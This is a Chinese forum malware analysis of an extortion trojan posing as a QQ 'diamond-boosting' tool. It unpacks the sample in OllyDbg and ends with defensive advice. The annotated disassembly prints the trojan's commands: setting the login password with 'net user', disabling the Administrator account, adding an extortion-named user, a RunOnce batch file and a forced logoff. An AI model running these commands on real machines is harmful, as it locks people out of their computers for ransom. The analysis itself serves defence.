好友
阅读权限10
听众
最后登录1970-1-1
|
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 Asmary 于 2013-12-21 12:34 编辑
一.基本信息
【报告名称】敲竹杠木马分析
【分析作者】Asmary
【作者邮件】asmary@163.com
【样本名称】刷钻.exe
【样本来源】互联网
【样本类型】恶意木马
【样本文件大小】362,496 字节
【样本文件MD5 校验值】DDB572A20433369821AEF9D0C7704EF9
【样本文件SHA1校验值】3C800E9BD517C05CECE7FB0F15CAF9216A648B89
【加壳信息】UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
【开发语言】易语言
【可能受到威胁系统:】XP/WIN7
【已知检测名称】敲竹杠木马
【报告日期】2013/12/12
【作者声明】仅为技术交流,如有不妥之处,敬请指出!
二.样本描述
此类木马近期在国内广泛流行,主要通过网盘,Q群共享文件等传播,木马主要伪装为刷钻、刷Q币、外挂等资源,诱导用户退出安全软件运行,木马运行后会篡改Windows开机密码,并在开机界面提示用户联系QQ获取开机密码,从而敲诈钱财!
三.样本分析
1.首先peid查看壳信息:UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo 节区名:UPX0 UPX1 ,典型的UPX压缩壳,载入OD查分析。
载入后OD停留在:
[AppleScript] 纯文本查看 复制代码 004BA150 > $ 60 pushad
004BA151 . BE 00C04600 mov esi,刷钻.0046C000
004BA156 . 8DBE 0050F9FF lea edi,dword ptr ds:[esi+FFF95000]
004BA15C . 57 push edi
004BA15D . 83CD FF or ebp,FFFFFFFF
004BA160 . EB 10 jmp short 刷钻.004BA172
2.UPX壳,使用esp定律吧,单步F8后,查看寄存器窗口esp,右键数据窗口跟随,来到数据区,右键选择断点—硬件访问—DWORD断点,F9运行,到跳转处按F8 到OEP处:
[AppleScript] 纯文本查看 复制代码 0044AC07 > 55 push ebp ; 程序OEP
0044AC08 8BEC mov ebp,esp
0044AC0A 6A FF push -1
0044AC0C 68 00414700 push 刷钻.00474100
0044AC11 68 84D44400 push 刷钻.0044D484
0044AC16 64:A1 00000000 mov eax,dword ptr fs:[0]
0044AC1C 50 push eax
0044AC1D 64:8925 0000000>mov dword ptr fs:[0],esp
0044AC24 83EC 58 sub esp,58
0044AC27 53 push ebx
0044AC28 56 push esi
0044AC29 57 push edi
0044AC2A 8965 E8 mov dword ptr ss:[ebp-18],esp
0044AC2D FF15 90D14600 call dword ptr ds:[<&kernel32.GetVersion>] ; kernel32.GetVersion
0044AC33 33D2 xor edx,edx
0044AC35 8AD4 mov dl,ah
0044AC37 8915 ACC04A00 mov dword ptr ds:[4AC0AC],edx
0044AC3D 8BC8 mov ecx,eax
0044AC3F 81E1 FF000000 and ecx,0FF
0044AC45 890D A8C04A00 mov dword ptr ds:[4AC0A8],ecx
0044AC4B C1E1 08 shl ecx,8
0044AC4E 03CA add ecx,edx
0044AC50 890D A4C04A00 mov dword ptr ds:[4AC0A4],ecx
0044AC56 C1E8 10 shr eax,10
0044AC59 A3 A0C04A00 mov dword ptr ds:[4AC0A0],eax
0044AC5E 6A 01 push 1
0044AC60 E8 8B4C0000 call 刷钻.0044F8F0 ;易语言入口特征
0044AC65 59 pop ecx
0044AC66 85C0 test eax,eax
0044AC68 75 08 jnz short 刷钻.0044AC72
0044AC6A 6A 1C push 1C
0044AC6C E8 C3000000 call 刷钻.0044AD34
0044AC71 59 pop ecx
0044AC72 E8 364A0000 call 刷钻.0044F6AD
0044AC77 85C0 test eax,eax
0044AC79 75 08 jnz short 刷钻.0044AC83
0044AC7B 6A 10 push 10
0044AC7D E8 B2000000 call 刷钻.0044AD34
0044AC82 59 pop ecx
0044AC83 33F6 xor esi,esi
0044AC85 8975 FC mov dword ptr ss:[ebp-4],esi
0044AC88 E8 64480000 call 刷钻.0044F4F1
0044AC8D FF15 14D34600 call dword ptr ds:[<&kernel32.GetCommandLineA>] ; kernel32.GetCommandLineA
0044AC93 A3 C4D84A00 mov dword ptr ds:[4AD8C4],eax
0044AC98 E8 22470000 call 刷钻.0044F3BF
0044AC9D A3 68C04A00 mov dword ptr ds:[4AC068],eax
0044ACA2 E8 CB440000 call 刷钻.0044F172
0044ACA7 E8 0D440000 call 刷钻.0044F0B9
0044ACAC E8 35350000 call 刷钻.0044E1E6
0044ACB1 8975 D0 mov dword ptr ss:[ebp-30],esi
0044ACB4 8D45 A4 lea eax,dword ptr ss:[ebp-5C]
0044ACB7 50 push eax
0044ACB8 FF15 A8D14600 call dword ptr ds:[<&kernel32.GetStartupInfoA>] ; kernel32.GetStartupInfoA
0044ACBE E8 9E430000 call 刷钻.0044F061
0044ACC3 8945 9C mov dword ptr ss:[ebp-64],eax
0044ACC6 F645 D0 01 test byte ptr ss:[ebp-30],1
0044ACCA 74 06 je short 刷钻.0044ACD2
0044ACCC 0FB745 D4 movzx eax,word ptr ss:[ebp-2C]
0044ACD0 EB 03 jmp short 刷钻.0044ACD5
0044ACD2 6A 0A push 0A
0044ACD4 58 pop eax
0044ACD5 50 push eax
0044ACD6 FF75 9C push dword ptr ss:[ebp-64]
0044ACD9 56 push esi
0044ACDA 56 push esi
0044ACDB FF15 08D34600 call dword ptr ds:[<&kernel32.GetModuleHandleA>] ; kernel32.GetModuleHandleA
0044ACE1 50 push eax
0044ACE2 E8 870D0100 call 刷钻.0045BA6E ; Winmain函数入口点
3.以上是程序初始化操作,例如:获取系统版本号、初始化堆栈空间、获取进程启动信息等!跳过程序初始化操作,主要看Winmain函数,该函数一般有4个参数,其中最后一个参数为当前实例句柄,而这个参数一般通过GetModuleHandleA函数来获得,所以很容易找到Winmain函数入口点0044ACE2 F7跟进去查看:
[AppleScript] 纯文本查看 复制代码 0045BA6E FF7424 10 push dword ptr ss:[esp+10] ; 窗口的显示模式
0045BA72 FF7424 10 push dword ptr ss:[esp+10] ; 命令行指针
0045BA76 FF7424 10 push dword ptr ss:[esp+10] ; 默认值为0
0045BA7A FF7424 10 push dword ptr ss:[esp+10] ; 当前实例句柄
0045BA7E E8 92840000 call 刷钻.00463F15
0045BA83 C2 1000 retn 10
4.Winmain函数的4个参数,跳过,F8到0045BA7E 然后F7跟进:
[AppleScript] 纯文本查看 复制代码 00463F15 53 push ebx
00463F16 56 push esi
00463F17 57 push edi
00463F18 83CB FF or ebx,FFFFFFFF
00463F1B E8 5CEDFFFF call 刷钻.00462C7C
00463F20 8BF0 mov esi,eax
00463F22 E8 61340000 call 刷钻.00467388
00463F27 FF7424 1C push dword ptr ss:[esp+1C]
00463F2B 8B78 04 mov edi,dword ptr ds:[eax+4]
00463F2E FF7424 1C push dword ptr ss:[esp+1C]
00463F32 FF7424 1C push dword ptr ss:[esp+1C]
00463F36 FF7424 1C push dword ptr ss:[esp+1C]
00463F3A E8 28420000 call 刷钻.00468167
00463F3F 85C0 test eax,eax
00463F41 74 3B je short 刷钻.00463F7E
00463F43 85FF test edi,edi
00463F45 74 0E je short 刷钻.00463F55
00463F47 8B07 mov eax,dword ptr ds:[edi]
00463F49 8BCF mov ecx,edi
00463F4B FF90 84000000 call dword ptr ds:[eax+84]
00463F51 85C0 test eax,eax
00463F53 74 29 je short 刷钻.00463F7E
00463F55 8B06 mov eax,dword ptr ds:[esi]
00463F57 8BCE mov ecx,esi
00463F59 FF50 50 call dword ptr ds:[eax+50]
5.上面主要是线程存储,设置错误模式等,跳过,F8到00463F59后,然后F7跟进:
[AppleScript] 纯文本查看 复制代码 0040B660 55 push ebp
0040B661 8BEC mov ebp,esp
0040B663 51 push ecx
0040B664 53 push ebx
0040B665 56 push esi
0040B666 8BF1 mov esi,ecx
0040B668 57 push edi
0040B669 8B4E 68 mov ecx,dword ptr ds:[esi+68]
0040B66C 8D86 D8000000 lea eax,dword ptr ds:[esi+D8]
0040B672 50 push eax
0040B673 51 push ecx
0040B674 E8 577C0000 call 刷钻.004132D0
0040B679 83C4 08 add esp,8
0040B67C 8D8E 90030000 lea ecx,dword ptr ds:[esi+390]
0040B682 68 02104000 push 刷钻.00401002
0040B687 68 00104000 push 刷钻.00401000
0040B68C 68 00104000 push 刷钻.00401000
0040B691 E8 4A470100 call 刷钻.0041FDE0
0040B696 60 pushad
0040B697 E8 625FFFFF call 刷钻.004015FE
6.线程堆栈初始化等操作,跳过,继续F8单步到0040B697 后,F7跟进:
[AppleScript] 纯文本查看 复制代码 004015FE B8 06000000 mov eax,6
00401603 E8 2D000000 call 刷钻.00401635
00401608 FC cld
00401609 DBE3 finit
0040160B E8 EDFFFFFF call 刷钻.004015FD
00401610 68 D6154000 push 刷钻.004015D6
00401615 B8 03000000 mov eax,3
0040161A E8 16000000 call 刷钻.00401635
0040161F 83C4 04 add esp,4
00401622 E8 A4FAFFFF call 刷钻.004010CB
00401627 E8 03000000 call 刷钻.0040162F
0040162C 33C0 xor eax,eax
0040162E C3 retn
7.加载窗口资源,设置进程操作目录,初始化,等操作,忽略,继续F8单步到00401622后,F7跟进
下面就是分析的主题部分:
[AppleScript] 纯文本查看 复制代码 004010CB 55 push ebp
004010CC 8BEC mov ebp,esp
004010CE 81EC 0C000000 sub esp,0C
004010D4 68 3C000000 push 3C
004010D9 E8 6F050000 call 刷钻.0040164D
004010DE 83C4 04 add esp,4
004010E1 8945 FC mov dword ptr ss:[ebp-4],eax
004010E4 8BD8 mov ebx,eax
004010E6 8BF8 mov edi,eax
004010E8 33C0 xor eax,eax
004010EA B9 0F000000 mov ecx,0F
004010EF F3:AB rep stos dword ptr es:[edi]
004010F1 83C3 08 add ebx,8
004010F4 B8 00000000 mov eax,0
004010F9 8903 mov dword ptr ds:[ebx],eax
004010FB 83C3 14 add ebx,14
004010FE B8 00000000 mov eax,0
00401103 8903 mov dword ptr ds:[ebx],eax
00401105 83C3 08 add ebx,8
00401108 B8 00000000 mov eax,0
0040110D 8903 mov dword ptr ds:[ebx],eax
0040110F 68 04000200 push 20004
00401114 6A 00 push 0
00401116 FF75 FC push dword ptr ss:[ebp-4]
00401119 68 01000000 push 1
0040111E B8 01000000 mov eax,1 ;忽略,以上主要是:保护现场,开辟初始化局部空间,变量初始化操作等
00401123 BB B0384400 mov ebx,刷钻.004438B0
00401128 E8 1A050000 call 刷钻.00401647 ; 获取用户名 系统目录等
0040112D 83C4 10 add esp,10
00401130 B8 50E74600 mov eax,刷钻.0046E750 ; 用户名:联系QQ78111975解锁
00401135 50 push eax
00401136 8B1D 18DF4800 mov ebx,dword ptr ds:[48DF18]
0040113C 85DB test ebx,ebx
0040113E 74 09 je short 刷钻.00401149
00401140 53 push ebx
00401141 E8 F5040000 call 刷钻.0040163B
00401146 83C4 04 add esp,4
00401149 58 pop eax
0040114A A3 18DF4800 mov dword ptr ds:[48DF18],eax
0040114F B8 63E74600 mov eax,刷钻.0046E763 ; 密码:admintiejiu520
00401154 50 push eax
00401155 8B1D 1CDF4800 mov ebx,dword ptr ds:[48DF1C]
0040115B 85DB test ebx,ebx
0040115D 74 09 je short 刷钻.00401168
0040115F 53 push ebx
00401160 E8 D6040000 call 刷钻.0040163B
00401165 83C4 04 add esp,4
00401168 58 pop eax
00401169 A3 1CDF4800 mov dword ptr ds:[48DF1C],eax
0040116E FF35 1CDF4800 push dword ptr ds:[48DF1C]
00401174 68 72E74600 push 刷钻.0046E772 ; net user %username%
00401179 B9 02000000 mov ecx,2
0040117E E8 ECFEFFFF call 刷钻.0040106F ; net命令连接密码
00401183 83C4 08 add esp,8
00401186 8945 F8 mov dword ptr ss:[ebp-8],eax
00401189 68 01030080 push 80000301
0040118E 6A 00 push 0
00401190 68 01000000 push 1
00401195 68 02000080 push 80000002
0040119A 6A 00 push 0
0040119C 68 00000000 push 0
004011A1 68 04000080 push 80000004
004011A6 6A 00 push 0
004011A8 8B45 F8 mov eax,dword ptr ss:[ebp-8]
004011AB 85C0 test eax,eax
004011AD 75 05 jnz short 刷钻.004011B4
004011AF B8 87E74600 mov eax,刷钻.0046E787
004011B4 50 push eax
004011B5 68 03000000 push 3
004011BA BB 90174000 mov ebx,刷钻.00401790
004011BF E8 7D040000 call 刷钻.00401641 ; 修改开机密码
004011C4 83C4 28 add esp,28
004011C7 8B5D F8 mov ebx,dword ptr ss:[ebp-8]
004011CA 85DB test ebx,ebx
004011CC 74 09 je short 刷钻.004011D7
004011CE 53 push ebx
004011CF E8 67040000 call 刷钻.0040163B
004011D4 83C4 04 add esp,4
004011D7 68 1CDF4800 push 刷钻.0048DF1C
004011DC E8 24020000 call 刷钻.00401405 ; 禁用账户
004011E1 68 1CDF4800 push 刷钻.0048DF1C
004011E6 68 18DF4800 push 刷钻.0048DF18
004011EB E8 E5020000 call 刷钻.004014D5 ; 创建用户
004011F0 68 88E74600 push 刷钻.0046E788 ; /del\r\ndel C:\Program Files\\1.bat
004011F5 FF35 18DF4800 push dword ptr ds:[48DF18]
004011FB 68 ABE74600 push 刷钻.0046E7AB ; net user
00401200 B9 03000000 mov ecx,3
00401205 E8 65FEFFFF call 刷钻.0040106F
0040120A 83C4 0C add esp,0C
0040120D 8945 F8 mov dword ptr ss:[ebp-8],eax
00401210 68 04000080 push 80000004
00401215 6A 00 push 0
00401217 8B45 F8 mov eax,dword ptr ss:[ebp-8]
0040121A 85C0 test eax,eax
0040121C 75 05 jnz short 刷钻.00401223
0040121E B8 87E74600 mov eax,刷钻.0046E787
00401223 50 push eax
00401224 68 01000000 push 1
00401229 BB 10194000 mov ebx,刷钻.00401910
0040122E E8 0E040000 call 刷钻.00401641
00401233 83C4 10 add esp,10
00401236 8945 F4 mov dword ptr ss:[ebp-C],eax
00401239 8B5D F8 mov ebx,dword ptr ss:[ebp-8]
0040123C 85DB test ebx,ebx
0040123E 74 09 je short 刷钻.00401249
00401240 53 push ebx
00401241 E8 F5030000 call 刷钻.0040163B
00401246 83C4 04 add esp,4
00401249 68 05000080 push 80000005
0040124E 6A 00 push 0
00401250 8B45 F4 mov eax,dword ptr ss:[ebp-C]
00401253 85C0 test eax,eax
00401255 75 05 jnz short 刷钻.0040125C
00401257 B8 B5E74600 mov eax,刷钻.0046E7B5
0040125C 50 push eax
0040125D 68 04000080 push 80000004
00401262 6A 00 push 0
00401264 68 BDE74600 push 刷钻.0046E7BD ; C:\Program Files\1.bat
00401269 68 02000000 push 2
0040126E BB C0194000 mov ebx,刷钻.004019C0
00401273 E8 C9030000 call 刷钻.00401641 ; 创建并运行1.bat
00401278 83C4 1C add esp,1C
0040127B 8B5D F4 mov ebx,dword ptr ss:[ebp-C]
0040127E 85DB test ebx,ebx
00401280 74 09 je short 刷钻.0040128B
00401282 53 push ebx
00401283 E8 B3030000 call 刷钻.0040163B
00401288 83C4 04 add esp,4
0040128B 68 04000080 push 80000004
00401290 6A 00 push 0
00401292 68 BDE74600 push 刷钻.0046E7BD ; C:\Program Files\1.bat
00401297 68 04000080 push 80000004
0040129C 6A 00 push 0
0040129E 68 D4E74600 push 刷钻.0046E7D4 ;SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\MicrosoftWindows
004012A3 68 01030080 push 80000301
004012A8 6A 00 push 0
004012AA 68 04000000 push 4
004012AF 68 03000000 push 3
004012B4 BB A01D4000 mov ebx,刷钻.00401DA0
004012B9 E8 83030000 call 刷钻.00401641 ; 注册表操作
004012BE 83C4 28 add esp,28
004012C1 E8 95020000 call 刷钻.0040155B
004012C6 68 01030080 push 80000301
004012CB 6A 00 push 0
004012CD 68 01000000 push 1
004012D2 68 02000080 push 80000002
004012D7 6A 00 push 0
004012D9 68 00000000 push 0
004012DE 68 04000080 push 80000004
004012E3 6A 00 push 0
004012E5 68 17E84600 push 刷钻.0046E817 ; shutdown -l
004012EA 68 03000000 push 3
004012EF BB 90174000 mov ebx,刷钻.00401790
004012F4 E8 48030000 call 刷钻.00401641 ; 注销机器
8.分别跟进各个行为具体操作:
修改开机密码:
[AppleScript] 纯文本查看 复制代码 00401836 50 push eax[/color]
[color=#000000]00401837 51 push ecx[/color]
[color=#000000]00401838 6A 00 push 0[/color]
[color=#000000]0040183A 6A 00 push 0[/color]
[color=#000000]0040183C 6A 00 push 0[/color]
[color=#000000]0040183E 6A 00 push 0[/color]
[color=#000000]00401840 6A 00 push 0[/color]
[color=#000000]00401842 6A 00 push 0[/color]
[color=#000000]00401844 52 push edx ; net user %username% admintiejiu520[/color]
[color=#000000]00401845 6A 00 push 0[/color]
[color=#000000]00401847 FF15 1CD34600 call dword ptr ds:[<&kernel32.CreateProc> ; kernel32.CreateProcessA
禁用账户:
[AppleScript] 纯文本查看 复制代码 0040140E 68 01030080 push 80000301[/color]
[color=#000000]00401413 6A 00 push 0[/color]
[color=#000000]00401415 68 01000000 push 1[/color]
[color=#000000]0040141A 68 02000080 push 80000002[/color]
[color=#000000]0040141F 6A 00 push 0[/color]
[color=#000000]00401421 68 01000000 push 1[/color]
[color=#000000]00401426 68 04000080 push 80000004[/color]
[color=#000000]0040142B 6A 00 push 0[/color]
[color=#000000]0040142D 68 23E84600 push 刷钻.0046E823 ; net user Administrator /active:no[/color]
[color=#000000]00401432 68 03000000 push 3[/color]
[color=#000000]00401437 BB 90174000 mov ebx,刷钻.00401790[/color]
[color=#000000]0040143C E8 00020000 call 刷钻.00401641
创建账户:
[AppleScript] 纯文本查看 复制代码 00401836 50 push eax[/color]
[color=#000000]00401837 51 push ecx[/color]
[color=#000000]00401838 6A 00 push 0[/color]
[color=#000000]0040183A 6A 00 push 0[/color]
[color=#000000]0040183C 6A 00 push 0[/color]
[color=#000000]0040183E 6A 00 push 0[/color]
[color=#000000]00401840 6A 00 push 0[/color]
[color=#000000]00401842 6A 00 push 0[/color]
[color=#000000]00401844 52 push edx ; net user 联系QQ78111975解锁 admintiejiu520 /add[/color]
[color=#000000]00401845 6A 00 push 000401847 FF15 1CD34600 call dword ptr ds:[<&kernel32.CreateProc> ; kernel32.CreateProcessA
批处理操作:
[AppleScript] 纯文本查看 复制代码 0045E74D 6A 03 push 3[/color]
[color=#000000]0045E74F 5F pop edi [/color]
[color=#000000]0045E750 6A 00 push 0[/color]
[color=#000000]0045E752 68 80000000 push 80[/color]
[color=#000000]0045E757 8D55 F4 lea edx,dword ptr ss:[ebp-C][/color]
[color=#000000]0045E75A 57 push edi[/color]
[color=#000000]0045E75B 52 push edx[/color]
[color=#000000]0045E75C 50 push eax[/color]
[color=#000000]0045E75D 51 push ecx[/color]
[color=#000000]0045E75E FF75 08 push dword ptr ss:[ebp+8] ; C:\Program Files\1.bat[/color]
[color=#000000]0045E761 FF15 6CD24600 call dword ptr ds:[<&kernel32.CreateFile> ; kernel32.CreateFileA
注册表操作:
[AppleScript] 纯文本查看 复制代码 00401C84 52 push edx[/color]
[color=#000000]00401C85 68 06000200 push 20006 [/color]
[color=#000000]00401C8A 6A 00 push 0[/color]
[color=#000000]00401C8C 8D348F lea esi,dword ptr ds:[edi+ecx*4][/color]
[color=#000000]00401C8F 8B4C24 1C mov ecx,dword ptr ss:[esp+1C][/color]
[color=#000000]00401C93 50 push eax [/color]
[color=#000000]00401C94 51 push ecx [/color]
[color=#000000]00401C95 C703 00000000 mov dword ptr ds:[ebx],0 [/color]
[color=#000000]00401C9B FF15 04D04600 call dword ptr ds:[<&ADVAPI32.RegOpenKey>; advapi32.RegOpenKeyExA 打开[/color]
[color=#000000]00401CA1 85C0 test eax,eax[/color]
[color=#000000]00401CA3 74 1D je short 刷钻.00401CC2 [/color]
[color=#000000]00401CA5 8B4424 0C mov eax,dword ptr ss:[esp+C][/color]
[color=#000000]00401CA9 8B4C24 10 mov ecx,dword ptr ss:[esp+10][/color]
[color=#000000]00401CAD 8D5424 30 lea edx,dword ptr ss:[esp+30][/color]
[color=#000000]00401CB1 52 push edx[/color]
[color=#000000]00401CB2 50 push eax [/color]
[color=#000000]00401CB3 51 push ecx [/color]
[color=#000000]00401CB4 FF15 0CD04600 call dword ptr ds:[<&ADVAPI32.RegCreateK> ; advapi32.RegCreateKeyA 创建[/color]
[color=#000000]00401CBA 85C0 test eax,eax [/color]
[color=#000000]00401CBC 0F85 B9000000 jnz 刷钻.00401D7B[/color]
[color=#000000]00401CC2 8B56 08 mov edx,dword ptr ds:[esi+8][/color]
[color=#000000]00401CC5 52 push edx[/color]
[color=#000000]00401CC6 E8 65860000 call 刷钻.0040A330[/color]
[color=#000000]00401CCB 83C4 04 add esp,4[/color]
[color=#000000]00401CCE 85C0 test eax,eax[/color]
[color=#000000]00401CD0 8B46 08 mov eax,dword ptr ds:[esi+8][/color]
[color=#000000]00401CD3 74 3D je short 刷钻.00401D12[/color]
[color=#000000]00401CD5 3D 01030080 cmp eax,80000301[/color]
[color=#000000]00401CDA 75 04 jnz short 刷钻.00401CE0[/color]
[color=#000000]00401CDC 8B06 mov eax,dword ptr ds:[esi][/color]
[color=#000000]00401CDE EB 0D jmp short 刷钻.00401CED[/color]
[color=#000000]00401CE0 6A 00 push 0[/color]
[color=#000000]00401CE2 56 push esi [/color]
[color=#000000]00401CE3 68 D1070000 push 7D1[/color]
[color=#000000]00401CE8 E8 13DB0000 call 刷钻.0040F800[/color]
[color=#000000]00401CED 8B5424 2C mov edx,dword ptr ss:[esp+2C] [/color]
[color=#000000]00401CF1 8D4C24 24 lea ecx,dword ptr ss:[esp+24][/color]
[color=#000000]00401CF5 6A 04 push 4[/color]
[color=#000000]00401CF7 51 push ecx [/color]
[color=#000000]00401CF8 894424 2C mov dword ptr ss:[esp+2C],eax[/color]
[color=#000000]00401CFC 8B4424 38 mov eax,dword ptr ss:[esp+38][/color]
[color=#000000]00401D00 6A 04 push 4[/color]
[color=#000000]00401D02 6A 00 push 0[/color]
[color=#000000]00401D04 52 push edx[/color]
[color=#000000]00401D05 50 push eax[/color]
[color=#000000]00401D06 FF15 08D04600 call dword ptr ds:[<&ADVAPI32.RegSetValu>; advapi32.RegSetValueExA 设置[/color]
[color=#000000]00401D0C 85C0 test eax,eax[/color]
[color=#000000]00401D0E 75 60 jnz short 刷钻.00401D70[/color]
[color=#000000]00401D10 EB 58 jmp short 刷钻.00401D6A[/color]
[color=#000000]00401D12 3D 04000080 cmp eax,80000004[/color]
[color=#000000]00401D17 75 28 jnz short 刷钻.00401D41 [/color]
[color=#000000]00401D19 8B36 mov esi,dword ptr ds:[esi][/color]
[color=#000000]00401D1B 83C9 FF or ecx,FFFFFFFF[/color]
[color=#000000]00401D1E 8BFE mov edi,esi [/color]
[color=#000000]00401D20 33C0 xor eax,eax[/color]
[color=#000000]00401D22 F2:AE repne scas byte ptr es:[edi][/color]
[color=#000000]00401D24 8B5424 30 mov edx,dword ptr ss:[esp+30][/color]
[color=#000000]00401D28 F7D1 not ecx [/color]
[color=#000000]00401D2A 51 push ecx [/color]
[color=#000000]00401D2B 8B4C24 30 mov ecx,dword ptr ss:[esp+30][/color]
[color=#000000]00401D2F 56 push esi [/color]
[color=#000000]00401D30 6A 01 push 1[/color]
[color=#000000]00401D32 50 push eax[/color]
[color=#000000]00401D33 51 push ecx [/color]
[color=#000000]00401D34 52 push edx[/color]
[color=#000000]00401D35 FF15 08D04600 call dword ptr ds:[<&ADVAPI32.RegSetValu>; advapi32.RegSetValueExA 设置[/color]
[color=#000000]00401D3B 85C0 test eax,eax[/color]
[color=#000000]00401D3D 75 31 jnz short 刷钻.00401D70[/color]
[color=#000000]00401D3F EB 29 jmp short 刷钻.00401D6A[/color]
[color=#000000]00401D41 3D 05000080 cmp eax,80000005[/color]
[color=#000000]00401D46 75 28 jnz short 刷钻.00401D70[/color]
[color=#000000]00401D48 8B36 mov esi,dword ptr ds:[esi][/color]
[color=#000000]00401D4A 8B4C24 2C mov ecx,dword ptr ss:[esp+2C] [/color]
[color=#000000]00401D4E 8B5424 30 mov edx,dword ptr ss:[esp+30][/color]
[color=#000000]00401D52 8B46 04 mov eax,dword ptr ds:[esi+4][/color]
[color=#000000]00401D55 83C6 08 add esi,8[/color]
[color=#000000]00401D58 50 push eax[/color]
[color=#000000]00401D59 56 push esi [/color]
[color=#000000]00401D5A 6A 03 push 3[/color]
[color=#000000]00401D5C 6A 00 push 0[/color]
[color=#000000]00401D5E 51 push ecx [/color]
[color=#000000]00401D5F 52 push edx[/color]
[color=#000000]00401D60 FF15 08D04600 call dword ptr ds:[<&ADVAPI32.RegSetValu>; advapi32.RegSetValueExA 设置[/color]
[color=#000000]00401D66 85C0 test eax,eax[/color]
[color=#000000]00401D68 75 06 jnz short 刷钻.00401D70[/color]
[color=#000000]00401D6A C703 01000000 mov dword ptr ds:[ebx],1[/color]
[color=#000000]00401D70 8B4424 30 mov eax,dword ptr ss:[esp+30][/color]
[color=#000000]00401D74 50 push eax[/color]
[color=#000000]00401D75 FF15 00D04600 call dword ptr ds:[<&ADVAPI32.RegCloseKe>; advapi32.RegCloseKey 关闭
注销计算机:
[AppleScript] 纯文本查看 复制代码 00401836 50 push eax[/color]
[color=#000000]00401837 51 push ecx[/color]
[color=#000000]00401838 6A 00 push 0[/color]
[color=#000000]0040183A 6A 00 push 0[/color]
[color=#000000]0040183C 6A 00 push 0[/color]
[color=#000000]0040183E 6A 00 push 0[/color]
[color=#000000]00401840 6A 00 push 0[/color]
[color=#000000]00401842 6A 00 push 0[/color]
[color=#000000]00401844 52 push edx ; shutdown -l 注销计算机[/color]
[color=#000000]00401845 6A 00 push 0[/color]
[color=#000000]00401847 FF15 1CD34600 call dword ptr ds:[<&kernel32.CreateProc> ; kernel32.CreateProcessA
四.分析结论
主要使用CreateProcess函数来执行一些列操作,如:修改密码,禁用用户,创建新用户,生成批处理文件,注册表启动,注销计算机等。
五.防御建议
1.尽量不使用administrator作为默认登录用户,此类木马貌似只对Administrator有效(部分木马样本)
2.最好的防御方法就是在本地计算机启用两个管理员帐号,这样即使当前账户被锁,也可以使用另一个账户恢复原账户,删除木马新建账户,删除相应注册表和批处理文件!
3.已中木马的用户,可使用例如老毛桃等PE工具重置密码!保持良好上网习惯,切勿运行陌生程序,安装安全软件等
|
免费评分
-
查看全部评分
|
[复制链接]
发表于 2013-12-21 12:33
发表于 2013-12-21 12:40
最近真是大牛辈出啊。。。。
